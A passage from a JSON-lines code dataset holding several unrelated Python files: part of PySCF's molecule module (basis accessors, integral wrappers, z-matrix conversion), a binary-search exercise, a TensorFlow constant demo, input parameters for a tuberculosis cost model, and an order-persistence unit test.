def update(self, chkfile):\n return self.update_from_chk(chkfile)\n def update_from_chk(self, chkfile):\n import h5py\n with h5py.File(chkfile, 'r') as fh5:\n mol = loads(fh5['mol'].value)\n self.__dict__.update(mol.__dict__)\n return self\n\n\n#######################################################\n#NOTE: atm_id or bas_id start from 0\n def atom_symbol(self, atm_id):\n r'''For the given atom id, return the input symbol (without stripping special characters)\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H^2 0 0 0; H 0 0 1.1')\n >>> mol.atom_symbol(0)\n H^2\n '''\n return _symbol(self._atom[atm_id][0])\n\n def atom_pure_symbol(self, atm_id):\n r'''For the given atom id, return the standard symbol (stripping special characters)\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H^2 0 0 0; H 0 0 1.1')\n >>> mol.atom_pure_symbol(0)\n H\n '''\n return _std_symbol(self._atom[atm_id][0])\n\n def atom_charge(self, atm_id):\n r'''Nuclear effective charge of the given atom id\n Note \"atom_charge /= _charge(atom_symbol)\" when ECP is enabled.\n Number of electrons screened by ECP can be obtained by _charge(atom_symbol)-atom_charge\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1')\n >>> mol.atom_charge(1)\n 17\n '''\n return self._atm[atm_id,CHARGE_OF]\n\n def atom_charges(self):\n '''np.asarray([mol.atom_charge(i) for i in range(mol.natm)])'''\n return self._atm[:,CHARGE_OF]\n\n def atom_nelec_core(self, atm_id):\n '''Number of core electrons for pseudo potential.\n '''\n return _charge(self.atom_symbol(atm_id)) - self.atom_charge(atm_id)\n\n def atom_coord(self, atm_id):\n r'''Coordinates (ndarray) of the given atom id\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1')\n >>> mol.atom_coord(1)\n [ 0. 0. 2.07869874]\n '''\n ptr = self._atm[atm_id,PTR_COORD]\n return self._env[ptr:ptr+3]\n\n def atom_coords(self):\n '''np.asarray([mol.atom_coord(i) for i in range(mol.natm)])'''\n ptr = self._atm[:,PTR_COORD]\n return self._env[numpy.vstack((ptr,ptr+1,ptr+2))].T\n\n def atom_nshells(self, atm_id):\n r'''Number of basis/shells of the given atom\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1')\n >>> mol.atom_nshells(1)\n 5\n '''\n return (self._bas[:,ATOM_OF] == atm_id).sum()\n\n def atom_shell_ids(self, atm_id):\n r'''A list of the shell-ids of the given atom\n\n Args:\n atm_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.atom_shell_ids(1)\n [3, 4, 5, 6, 7]\n '''\n return numpy.where(self._bas[:,ATOM_OF] == atm_id)[0]\n\n def bas_coord(self, bas_id):\n r'''Coordinates (ndarray) associated with the given basis id\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1')\n >>> mol.bas_coord(1)\n [ 0. 0. 2.07869874]\n '''\n atm_id = self.bas_atom(bas_id)\n ptr = self._atm[atm_id,PTR_COORD]\n return self._env[ptr:ptr+3]\n\n def bas_atom(self, bas_id):\n r'''The atom (0-based id) that the given basis sits on\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_atom(7)\n 1\n '''\n return self._bas[bas_id,ATOM_OF]\n\n def bas_angular(self, bas_id):\n r'''The angular momentum associated with the given basis\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_angular(7)\n 2\n '''\n return self._bas[bas_id,ANG_OF]\n\n def bas_nctr(self, bas_id):\n r'''The number of contracted GTOs for the given shell\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_nctr(3)\n 3\n '''\n return self._bas[bas_id,NCTR_OF]\n\n def bas_nprim(self, bas_id):\n r'''The number of primitive GTOs for the given shell\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_nprim(3)\n 11\n '''\n return self._bas[bas_id,NPRIM_OF]\n\n def bas_kappa(self, bas_id):\n r'''Kappa (if l < j, -l-1, else l) of the given shell\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_kappa(3)\n 0\n '''\n return self._bas[bas_id,KAPPA_OF]\n\n def bas_exp(self, bas_id):\n r'''exponents (ndarray) of the given shell\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_exp(0)\n [ 13.01 1.962 0.4446]\n '''\n nprim = self.bas_nprim(bas_id)\n ptr = self._bas[bas_id,PTR_EXP]\n return self._env[ptr:ptr+nprim]\n\n def _libcint_ctr_coeff(self, bas_id):\n nprim = self.bas_nprim(bas_id)\n nctr = self.bas_nctr(bas_id)\n ptr = self._bas[bas_id,PTR_COEFF]\n return self._env[ptr:ptr+nprim*nctr].reshape(nctr,nprim).T\n def bas_ctr_coeff(self, bas_id):\n r'''Contraction coefficients (ndarray) of the given shell\n\n Args:\n bas_id : int\n 0-based\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; Cl 0 0 1.1', basis='cc-pvdz')\n >>> mol.bas_ctr_coeff(0)\n [[ 10.03400444]\n [ 4.1188704 ]\n [ 1.53971186]]\n '''\n l = self.bas_angular(bas_id)\n es = self.bas_exp(bas_id)\n cs = self._libcint_ctr_coeff(bas_id)\n cs = numpy.einsum('pi,p->pi', cs, 1/gto_norm(l, es))\n return cs\n\n def bas_len_spinor(self, bas_id):\n 
'''The number of spinor associated with given basis\n If kappa is 0, return 4l+2\n '''\n l = self.bas_angular(bas_id)\n k = self.bas_kappa(bas_id)\n return len_spinor(l, k)\n\n def bas_len_cart(self, bas_id):\n '''The number of Cartesian function associated with given basis\n '''\n return len_cart(self._bas[bas_id,ANG_OF])\n\n\n npgto_nr = npgto_nr\n\n nao_nr = nao_nr\n nao_2c = nao_2c\n nao_cart = nao_cart\n\n nao_nr_range = nao_nr_range\n nao_2c_range = nao_2c_range\n\n ao_loc_nr = ao_loc_nr\n ao_loc_2c = ao_loc_2c\n\n def tmap(self):\n return time_reversal_map(self)\n time_reversal_map = time_reversal_map\n\n def intor(self, intor, comp=1, hermi=0, aosym='s1', out=None,\n shls_slice=None):\n '''Integral generator.\n\n Args:\n intor : str\n Name of the 1e or 2e AO integrals. Ref to :func:`getints` for the\n complete list of available 1-electron integral names\n\n Kwargs:\n comp : int\n Components of the integrals, e.g. cint1e_ipovlp has 3 components.\n hermi : int\n Symmetry of the integrals\n\n | 0 : no symmetry assumed (default)\n | 1 : hermitian\n | 2 : anti-hermitian\n\n Returns:\n ndarray of 1-electron integrals, can be either 2-dim or 3-dim, depending on comp\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; H 0 0 1.1', basis='sto-3g')\n >>> mol.intor('cint1e_ipnuc_sph', comp=3) # \n [[[ 0. 0. ]\n [ 0. 0. ]]\n [[ 0. 0. ]\n [ 0. 0. ]]\n [[ 0.10289944 0.48176097]\n [-0.48176097 -0.10289944]]]\n >>> mol.intor('cint1e_nuc')\n [[-1.69771092+0.j 0.00000000+0.j -0.67146312+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j -0.67146312+0.j]\n [-0.67146312+0.j 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -0.67146312+0.j 0.00000000+0.j -1.69771092+0.j]]\n '''\n if 'ECP' in intor:\n assert(self._ecp is not None)\n bas = numpy.vstack((self._bas, self._ecpbas))\n self._env[PTR_ECPBAS_OFFSET] = len(self._bas)\n self._env[PTR_NECPBAS] = len(self._ecpbas)\n if shls_slice is None:\n shls_slice = (0, self.nbas, 0, self.nbas)\n else:\n bas = self._bas\n return moleintor.getints(intor, self._atm, bas, self._env,\n shls_slice, comp=comp, hermi=hermi,\n aosym=aosym, out=out)\n\n def intor_symmetric(self, intor, comp=1):\n '''One-electron integral generator. The integrals are assumed to be hermitian\n\n Args:\n intor : str\n Name of the 1-electron integral. Ref to :func:`getints` for the\n complete list of available 1-electron integral names\n\n Kwargs:\n comp : int\n Components of the integrals, e.g. cint1e_ipovlp has 3 components.\n\n Returns:\n ndarray of 1-electron integrals, can be either 2-dim or 3-dim, depending on comp\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; H 0 0 1.1', basis='sto-3g')\n >>> mol.intor_symmetric('cint1e_nuc')\n [[-1.69771092+0.j 0.00000000+0.j -0.67146312+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j -0.67146312+0.j]\n [-0.67146312+0.j 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -0.67146312+0.j 0.00000000+0.j -1.69771092+0.j]]\n '''\n return self.intor(intor, comp, 1, aosym='s4')\n\n def intor_asymmetric(self, intor, comp=1):\n '''One-electron integral generator. The integrals are assumed to be anti-hermitian\n\n Args:\n intor : str\n Name of the 1-electron integral. Ref to :func:`getints` for the\n complete list of available 1-electron integral names\n\n Kwargs:\n comp : int\n Components of the integrals, e.g. 
cint1e_ipovlp has 3 components.\n\n Returns:\n ndarray of 1-electron integrals, can be either 2-dim or 3-dim, depending on comp\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; H 0 0 1.1', basis='sto-3g')\n >>> mol.intor_asymmetric('cint1e_nuc')\n [[-1.69771092+0.j 0.00000000+0.j 0.67146312+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j 0.67146312+0.j]\n [-0.67146312+0.j 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -0.67146312+0.j 0.00000000+0.j -1.69771092+0.j]]\n '''\n return self.intor(intor, comp, 2, aosym='a4')\n\n @pyscf.lib.with_doc(moleintor.getints_by_shell.__doc__)\n def intor_by_shell(self, intor, shells, comp=1):\n if 'ECP' in intor:\n assert(self._ecp is not None)\n bas = numpy.vstack((self._bas, self._ecpbas))\n self._env[PTR_ECPBAS_OFFSET] = len(self._bas)\n self._env[PTR_NECPBAS] = len(self._ecpbas)\n else:\n bas = self._bas\n return moleintor.getints_by_shell(intor, shells, self._atm, bas,\n self._env, comp)\n\n @pyscf.lib.with_doc(eval_gto.__doc__)\n def eval_gto(self, eval_name, coords,\n comp=1, shls_slice=None, non0tab=None, out=None):\n return eval_gto(eval_name, self._atm, self._bas, self._env,\n coords, comp, shls_slice, non0tab, out)\n\n def energy_nuc(self):\n return energy_nuc(self)\n def get_enuc(self):\n return self.energy_nuc()\n\n @pyscf.lib.with_doc(cart_labels.__doc__)\n def cart_labels(self, fmt=False):\n return cart_labels(self, fmt)\n\n @pyscf.lib.with_doc(spheric_labels.__doc__)\n def spheric_labels(self, fmt=False):\n return spheric_labels(self, fmt)\n\n def search_shell_id(self, atm_id, l):\n return search_shell_id(self, atm_id, l)\n\n search_ao_nr = search_ao_nr\n search_ao_r = search_ao_r\n\n offset_nr_by_atom = offset_nr_by_atom\n offset_2c_by_atom = offset_2c_by_atom\n\n @pyscf.lib.with_doc(spinor_labels.__doc__)\n def spinor_labels(self):\n return spinor_labels(self)\n\n condense_to_shell = condense_to_shell\n\n __add__ = conc_mol\n\n_ELEMENTDIC = dict((k.upper(),v) for k,v in param.ELEMENTS_PROTON.items())\n\ndef _rm_digit(symb):\n if symb.isalpha():\n return symb\n else:\n return ''.join([i for i in symb if i.isalpha()])\n\ndef _charge(symb_or_chg):\n if isinstance(symb_or_chg, str):\n return param.ELEMENTS_PROTON[_rm_digit(symb_or_chg)]\n else:\n return symb_or_chg\n\ndef _symbol(symb_or_chg):\n if isinstance(symb_or_chg, str):\n return symb_or_chg\n else:\n return param.ELEMENTS[symb_or_chg][0]\n\ndef _std_symbol(symb_or_chg):\n if isinstance(symb_or_chg, str):\n rawsymb = _rm_digit(symb_or_chg)\n return param.ELEMENTS[_ELEMENTDIC[rawsymb.upper()]][0]\n else:\n return param.ELEMENTS[symb_or_chg][0]\n\ndef _parse_nuc_mod(str_or_int):\n if isinstance(str_or_int, int):\n return str_or_int\n elif 'G' in str_or_int.upper(): # 'gauss_nuc'\n return NUC_GAUSS\n else:\n return NUC_POINT\n\ndef _update_from_cmdargs_(mol):\n # Ipython shell conflicts with optparse\n # pass sys.argv when using ipython\n try:\n __IPYTHON__\n sys.stderr.write('Warn: IPython shell catches sys.argv\\n')\n return None\n except:\n pass\n\n if not mol._built: # parse cmdline args only once\n opts = cmd_args.cmd_args()\n\n if opts.verbose:\n mol.verbose = opts.verbose\n if opts.max_memory:\n mol.max_memory = opts.max_memory\n\n if opts.output:\n mol.output = opts.output\n\n if mol.output is not None:\n if os.path.isfile(mol.output):\n #os.remove(mol.output)\n if mol.verbose > logger.QUIET:\n print('overwrite output file: %s' % mol.output)\n else:\n if mol.verbose > logger.QUIET:\n print('output file: %s' % mol.output)\n\n\ndef 
from_zmatrix(atomstr):\n '''>>> a = \"\"\"H\n H 1 2.67247631453057\n H 1 4.22555607338457 2 50.7684795164077\n H 1 2.90305235726773 2 79.3904651036893 3 6.20854462618583\"\"\"\n >>> for x in zmat2cart(a): print x\n ['H', array([ 0., 0., 0.])]\n ['H', array([ 2.67247631, 0. , 0. ])]\n ['H', array([ 2.67247631, 0. , 3.27310166])]\n ['H', array([ 0.53449526, 0.30859098, 2.83668811])]\n '''\n import pyscf.symm\n atomstr = atomstr.replace(';','\\n').replace(',',' ')\n atoms = []\n for line in atomstr.split('\\n'):\n if line.strip():\n rawd = line.split()\n if len(rawd) < 3:\n atoms.append([rawd[0], numpy.zeros(3)])\n elif len(rawd) == 3:\n atoms.append([rawd[0], numpy.array((float(rawd[2]), 0, 0))])\n elif len(rawd) == 5:\n bonda = int(rawd[1]) - 1\n bond = float(rawd[2])\n anga = int(rawd[3]) - 1\n ang = float(rawd[4])/180*numpy.pi\n v1 = atoms[anga][1] - atoms[bonda][1]\n if not numpy.allclose(v1[:2], 0):\n vecn = numpy.cross(v1, numpy.array((0.,0.,1.)))\n else: # on z\n vecn = numpy.array((0.,0.,1.))\n rmat = pyscf.symm.rotation_mat(vecn, ang)\n c = numpy.dot(rmat, v1) * (bond/numpy.linalg.norm(v1))\n atoms.append([rawd[0], atoms[bonda][1]+c])\n else: # FIXME\n bonda = int(rawd[1]) - 1\n bond = float(rawd[2])\n anga = int(rawd[3]) - 1\n ang = float(rawd[4])/180*numpy.pi\n diha = int(rawd[5]) - 1\n dih = float(rawd[6])/180*numpy.pi\n v1 = atoms[anga][1] - atoms[bonda][1]\n v2 = atoms[diha][1] - atoms[anga][1]\n vecn = numpy.cross(v2, -v1)\n rmat = pyscf.symm.rotation_mat(v1, -dih)\n vecn = numpy.dot(rmat, vecn) / numpy.linalg.norm(vecn)\n rmat = pyscf.symm.rotation_mat(vecn, ang)\n c = numpy.dot(rmat, v1) * (bond/numpy.linalg.norm(v1))\n atoms.append([rawd[0], atoms[bonda][1]+c])\n return atoms\nzmat2cart = zmat = from_zmatrix\n\ndef cart2zmat(coord):\n '''>>> c = numpy.array((\n (0.000000000000, 1.889726124565, 0.000000000000),\n (0.000000000000, 0.000000000000, -1.889726124565),\n (1.889726124565, -1.889726124565, 0.000000000000),\n (1.889726124565, 0.000000000000, 1.133835674739)))\n >>> print cart2zmat(c)\n 1\n 1 2.67247631453057\n 1 4.22555607338457 2 50.7684795164077\n 1 2.90305235726773 2 79.3904651036893 3 6.20854462618583\n '''\n zstr = []\n zstr.append('1')\n if len(coord) > 1:\n r1 = coord[1] - coord[0]\n nr1 = numpy.linalg.norm(r1)\n zstr.append('1 %.15g' % nr1)\n if len(coord) > 2:\n r2 = coord[2] - coord[0]\n nr2 = numpy.linalg.norm(r2)\n a = numpy.arccos(numpy.dot(r1,r2)/(nr1*nr2))\n zstr.append('1 %.15g 2 %.15g' % (nr2, a*180/numpy.pi))\n if len(coord) > 3:\n o0, o1, o2 = coord[:3]\n p0, p1, p2 = 1, 2, 3\n for k, c in enumerate(coord[3:]):\n r0 = c - o0\n nr0 = numpy.linalg.norm(r0)\n r1 = o1 - o0\n nr1 = numpy.linalg.norm(r1)\n a1 = numpy.arccos(numpy.dot(r0,r1)/(nr0*nr1))\n b0 = numpy.cross(r0, r1)\n nb0 = numpy.linalg.norm(b0)\n\n if abs(nb0) < 1e-7: # o0, o1, c in line\n a2 = 0\n zstr.append('%d %.15g %d %.15g %d %.15g' %\n (p0, nr0, p1, a1*180/numpy.pi, p2, a2))\n else:\n b1 = numpy.cross(o2-o0, r1)\n nb1 = numpy.linalg.norm(b1)\n\n if abs(nb1) < 1e-7: # o0 o1 o2 in line\n a2 = 0\n zstr.append('%d %.15g %d %.15g %d %.15g' %\n (p0, nr0, p1, a1*180/numpy.pi, p2, a2))\n o2 = c\n p2 = 4 + k\n else:\n if numpy.dot(numpy.cross(b1, b0), r1) < 0:\n a2 = numpy.arccos(numpy.dot(b1, b0) / (nb0*nb1))\n else:\n a2 =-numpy.arccos(numpy.dot(b1, b0) / (nb0*nb1))\n zstr.append('%d %.15g %d %.15g %d %.15g' %\n (p0, nr0, p1, a1*180/numpy.pi, p2, a2*180/numpy.pi))\n\n return '\\n'.join(zstr)\n\ndef dyall_nuc_mod(mass, c=param.LIGHTSPEED):\n ''' Generate the nuclear charge distribution 
parameter zeta\n rho(r) = nuc_charge * Norm * exp(-zeta * r^2)\n\n Ref. L. Visscher and K. Dyall, At. Data Nucl. Data Tables, 67, 207 (1997)\n '''\n r = (0.836 * mass**(1./3) + 0.570) / 52917.7249;\n zeta = 1.5 / (r**2);\n return zeta\n\ndef filatov_nuc_mod(nuc_charge, c=param.LIGHTSPEED):\n ''' Generate the nuclear charge distribution parameter zeta\n rho(r) = nuc_charge * Norm * exp(-zeta * r^2)\n\n Ref. M. Filatov and D. Cremer, Theor. Chem. Acc. 108, 168 (2002)\n M. Filatov and D. Cremer, Chem. Phys. Lett. 351, 259 (2002)\n '''\n if isinstance(nuc_charge, str):\n nuc_charge = _charge(nuc_charge)\n r = (-0.263188*nuc_charge + 106.016974 + 138.985999/nuc_charge) / c**2\n zeta = 1 / (r**2)\n return zeta\n\n","repo_name":"sunchong137/pyscf_2017","sub_path":"gto/mole.py","file_name":"mole.py","file_ext":"py","file_size_in_byte":87671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15718211080","text":"def search(arr, target):\n l, r = 0, len(arr) - 1\n while l <= r:\n mid = (l + r) // 2\n if arr[mid] == target:\n return True\n elif arr[mid] > target:\n r = mid - 1\n else:\n l = mid + 1\n return False\n\n\nif __name__ == '__main__':\n n = int(input())\n arr_1 = list(map(int, input().split()))\n q = int(input())\n arr_2 = list(map(int, input().split()))\n ans = 0\n for element in arr_2:\n if search(arr_1, element):\n ans += 1\n print(ans)\n","repo_name":"xiaolinzi-xl/challenge-programming-competition-2","sub_path":"chapter_5/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22192153296","text":"import tensorflow as tf\nimport numpy as np\n\nclass TensorFlow:\n def run(self):\n num1 = np.array([1,2,3])\n num2 = np.array([1,2,3])\n \n input1 = tf.constant(num1);\n input2 = tf.constant(num2);\n \n result = input1 + input2;\n \n with tf.Session() as sess :\n init = tf.global_variables_initializer()\n sess.run(init)\n return sess.run(result)\n\t\t\t\n\ntensorflow = TensorFlow()\nprint(tensorflow.run())","repo_name":"sonusinghrajput11/Machine-Learning","sub_path":"TensorFlow Building Blocks (Examples)/tf_constant.py","file_name":"tf_constant.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19360221007","text":"\n# simulation settings\nPOP_SIZE = 5000 # cohort population size\nN_COHORTS = 20\nSIM_LENGTH = 10*52 # length of simulation (years)\n#SIM_LENGTH = 1*52 # length of simulation (years)\nALPHA = 0.05 # significance level for calculating confidence intervals\nDISCOUNT = 0.03 # annual discount rate\n\n# # annual probability of background mortality (number per year per 1,000 population)\n# ANNUAL_PROB_BACKGROUND_MORT = 8.15 / 1000\n\n# rate transition matrix\n# CONSIDER MAKING CLEARED_TBM WITH A LOWER HEALTH UTILITY GIVEN ADVERSE SEQUELAE OF TBM\n# SOC_RATE_TRANS_MATRIX = [\n# [0, 1/160, 7/480, 1/48, 0, 1/24, 0], # INFECTED\n# [0, 0, 0, 141/250, 109/250, 0, 0], # HOSP_TBD\n# [0, 0, 0, 0, 109/250, 0, 141/250], # HOSP_TBM\n# [0, 0, 0, 0, 3/8000, 991/24000, 0], # DX_TBD\n# [0, 0, 0, 0, 0, 0, 0], # DEAD\n# [0, 0, 0, 0,1/(62.77*52), 0, 0], # CLEARED\n# [0, 0, 0, 0, 193/24000, 269/8000, 0] # DX_TBM\n# ]\n\n# average time spent in each state (given in the unit weeks)\nT_INF = 12\nT_HOSP_TBD = 1\nT_HOSP_TBM = 2\nT_DX_TBD = 24\nT_DX_TBM = 24\nT_CLEARED = 62.77*52\n\n# probability of input 
parameters to determine the rate_transition_matrix\n# assumptions that diagnostic yield is the most important piece of information\nP_DX_SOC = 0.29 # (alpha) diagnostic yield of investigations\nP_DX_NSB = 0.52 # (.4-.9) (alpha) diagnostic yield of investigations (NSB)\n\n# assumptions that death in the hospital is the same for both states\nP_DEATH_IN_HOSP = 0.436 # (0.368-0.506) (beta) probability of death in the hospital (relationship w/ alpha)\n # from Jenkins; probability of dying within 1 year of diagnosis\n\nP_INFECTED_CLEARED = 0.5\nP_INFECTED_TBM = 0.15 # (0.1-0.2)\nP_INFECTED_TBD = 0.35 # (0.3-0.4)\n\nP_DX_TBD_DEATH = 0.009 # (0.5-1.6) probability of death in DX_TBD state (on treatment with TBD)\nP_DX_TBM_DEATH = 0.193 # (0.14-0.261) probability of death in DX_TBM state (on treatment with TBM)\n\n# NEED TO UPDATE NSB RATE TRANS MATRIX\n# NSB_RATE_TRANS_MATRIX = [\n# [0, XXX, XXX, XXX, 0, XXX], # INFECTED\n# [0, 0, 0, XXX, XXX, 0], # HOSP_TBD\n# [0, 0, 0, XXX, XXX, 0], # HOSP_TBM\n# [0, 0, 0, 0, XXX, XXX], # DX_TB\n# [0, 0, 0, 0, 0, 0], # DEAD\n# [0, 0, 0, 0, XXX, 0], # CLEARED\n# [0, 0, 0, 0, XXX, 0]\n# ]\n\n# NEED TO INPUT WEEKLY COST OF EACH HEALTH STATE\n# annual cost of each health state\nWEEKLY_STATE_COST = [\n 0, # INFECTED\n 392, # HOSP_TBD\n 392, # HOSP_TBM\n 1.75, # DX_TBD\n 0, # DEAD\n 0, # CLEARED\n 1.75 # DX_TBM\n]\n# NEED TO INPUT HEALTH UTILITY OF EACH HEALTH STATE????\n# annual health utility of each health state\n# WEEKLY_STATE_UTILITY = [\n# 0, # INFECTED # cost of medicines, doctors appointments, etc\n# 0, # HOSP_TBD # costs associated with hospitalization associated with TBD\n# 0, # HOSP_TBM # costs associated with hospitalization for TBM\n# 0, # DEAD # no costs\n# 0, # CLEARED # no costs\n# 0\n# ]\n\n# Diagnostic Costs associated with SOC vs. 
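+# The commented-out SOC matrix above is consistent with the usual competing-risks
+# conversion rate(i -> j) = P(branch to j) / T_i, with T_i the mean sojourn time
+# in weeks, so each row's exit rates sum to 1/T_i (e.g. the INFECTED row sums to
+# 1/T_INF = 1/12). A minimal sketch of that conversion (helper name is
+# illustrative, not from the original file):
+def weekly_rate(branch_prob, mean_sojourn_weeks):
+    # rate out of a state toward one destination, per week
+    return branch_prob / mean_sojourn_weeks
+
+# e.g. INFECTED -> CLEARED: weekly_rate(0.5, 12) == 1/24, matching the 1/24
+# entry in the commented SOC_RATE_TRANS_MATRIX row for INFECTED.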
NSB\n# one time costs associated with the diagnosis of TB at the infected, hosp_tbd, hosp_tbm states\nSOC_ONE_TIME_COST = [\n 0, # INFECTED (charged only when the patient goes from INFECTED to DX)\n 98, # HOSP_TBD\n 98, # HOSP_TBM\n 15, # DX_TBD\n 0, # DEAD\n 0, # CLEARED\n 15 # DX_TBM\n]\n\nNSB_ONE_TIME_COST = [\n 0, # INFECTED (charged only when the patient goes from INFECTED to DX)\n 98, # HOSP_TBD\n 98, # HOSP_TBM\n 15 + 3, # DX_TBD\n 0, # DEAD\n 0, # CLEARED\n 15 + 3 # DX_TBM\n]\n","repo_name":"kennyguna/urine_LAM_model","sub_path":"InputData.py","file_name":"InputData.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2982268893","text":"T = int(raw_input())\n\nfor t in range(T):\n \n max_probability = 0\n\n H, S = map(int, raw_input().split())\n dices = raw_input().split()\n\n for dice in dices:\n is_negative = (dice.find('-') != -1)\n has_z = (dice.find('+') != -1) or (dice.find('-') != -1)\n\n dice = dice.replace('+', ' ')\n dice = dice.replace('-', ' ')\n dice = dice.replace('d', ' ')\n\n X = 0\n Y = 0\n Z = 0\n\n if has_z:\n X, Y, Z = map(int, dice.split())\n\n if is_negative:\n Z = Z * -1\n\n else:\n X, Y = map(int, dice.split())\n\n MAX_SUM = X * Y + 1\n\n count = [[0] * MAX_SUM for _ in range(X + 1)]\n count[0][0] = 1\n\n for x in range(X):\n for i in range(MAX_SUM):\n for y in range(Y):\n if (i + y + 1) < MAX_SUM:\n count[x + 1][i + y + 1] += count[x][i];\n\n over_count = 0\n total_count = 0\n \n for i in range(MAX_SUM):\n total_count += count[X][i];\n if ((i + Z) >= H):\n over_count += count[X][i];\n\n\n probability = over_count / (float)(total_count);\n max_probability = max(probability, max_probability);\n \n print('Case #%d: %.6f' % (t + 1, max_probability))\n","repo_name":"tobygameac/Problem-Solving","sub_path":"Facebook Hacker Cup/2017/Qualification Round/Fighting the Zombie.py","file_name":"Fighting the Zombie.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"317560272","text":"import unittest\n\nimport sqlite3\nfrom typing import Tuple\nfrom datetime import datetime\n\nfrom order_service.order.persistence import create_order\nfrom order_service.order import db\nfrom order_service.order.model import Order, OrderItem\n\nclass TestPersistence(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.conn = sqlite3.connect(':memory:')\n db.init_db(cls.conn)\n \n def test_create_order(self):\n order = Order(\n customer_id=2,\n customer_name='Tansinee T.',\n is_member=True,\n items=[\n OrderItem(product_id=3, amount=15, price_per_unit=10.0),\n OrderItem(product_id=4, amount=13, price_per_unit=5.0)\n ]\n )\n\n new_order = create_order(order, self.conn)\n order_id = new_order.order_id\n\n actual_order, actual_items = self._load_order(order_id)\n self.assert_order(order, actual_order)\n assert len(order.items) == len(actual_items)\n for order_item, acutal_item in zip(order.items, actual_items):\n self.assert_order_item(order_item, acutal_item)\n\n def _load_order(self, order_id):\n cursor = self.conn.cursor()\n cursor.execute('SELECT customer_id, customer_name, is_member, date FROM orders WHERE id = ?', \n (order_id,))\n order = cursor.fetchone()\n\n cursor.execute('SELECT product_id, amount, price_per_unit FROM order_items WHERE order_id = ?', \n (order_id,))\n order_items = cursor.fetchall()\n\n return order, order_items\n\n def assert_order(self, expected: 
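+# The dice DP in the 'Fighting the Zombie' record above counts, for X dice with
+# Y faces each, how many ways every total can occur. The same distribution can
+# be built by repeated convolution with a Counter (a sketch, not the contest code):
+from collections import Counter
+
+def dice_sum_distribution(num_dice, faces):
+    dist = Counter({0: 1})                     # ways to reach each running total
+    for _ in range(num_dice):
+        nxt = Counter()
+        for total, ways in dist.items():
+            for face in range(1, faces + 1):
+                nxt[total + face] += ways
+        dist = nxt
+    return dist
+
+def beat_probability(num_dice, faces, modifier, target):
+    # P(sum of XdY + Z >= H), matching the over_count / total_count ratio above
+    dist = dice_sum_distribution(num_dice, faces)
+    total = sum(dist.values())                 # == faces ** num_dice
+    return sum(w for s, w in dist.items() if s + modifier >= target) / total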
Order, db_actual: Tuple):\n assert db_actual[0] == expected.customer_id\n assert db_actual[1] == expected.customer_name\n assert db_actual[2] == expected.is_member\n assert datetime.strptime(db_actual[3], '%Y-%m-%d %H:%M:%S.%f') == expected.date\n \n def assert_order_item(self, expected: OrderItem, db_actual: Tuple):\n assert db_actual[0] == expected.product_id\n assert db_actual[1] == expected.amount\n assert db_actual[2] == expected.price_per_unit\n\n @classmethod\n def tearDownClass(cls):\n cls.conn.close()\n","repo_name":"webscal3r/kafka201","sub_path":"python/order_service/tests/persistence/test_create_order.py","file_name":"test_create_order.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6871659196","text":"# Importing all the libraries that are required to run this Object Detection API:\r\n\r\nimport numpy as np\r\nimport os\r\nimport six.moves.urllib as urllib\r\nimport sys\r\nimport tarfile\r\nimport tensorflow as tf\r\nimport zipfile\r\nimport pathlib\r\nfrom collections import defaultdict\r\nfrom io import StringIO\r\nfrom 